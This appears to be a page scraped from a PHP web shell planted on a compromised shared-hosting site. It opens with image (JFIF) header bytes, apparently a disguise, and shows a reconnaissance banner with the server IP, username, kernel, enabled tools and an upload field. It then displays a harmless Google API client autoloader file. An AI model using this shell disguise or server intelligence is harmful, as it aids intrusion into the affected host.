����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 216.73.216.99 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/./gltevjme/ideyshare.name.ng/app/libraries/vendor/google/apiclient/src/Google/ |
Upload File : |
<?php /** * THIS FILE IS FOR BACKWARDS COMPATIBLITY ONLY * * If you were not already including this file in your project, please ignore it */ $file = __DIR__ . '/../../vendor/autoload.php'; if (!file_exists($file)) { $exception = 'This library must be installed via composer or by downloading the full package.'; $exception .= ' See the instructions at https://github.com/google/google-api-php-client#installation.'; throw new Exception($exception); } $error = 'google-api-php-client\'s autoloader was moved to vendor/autoload.php in 2.0.0. This '; $error .= 'redirect will be removed in 2.1. Please adjust your code to use the new location.'; trigger_error($error, E_USER_DEPRECATED); require_once $file;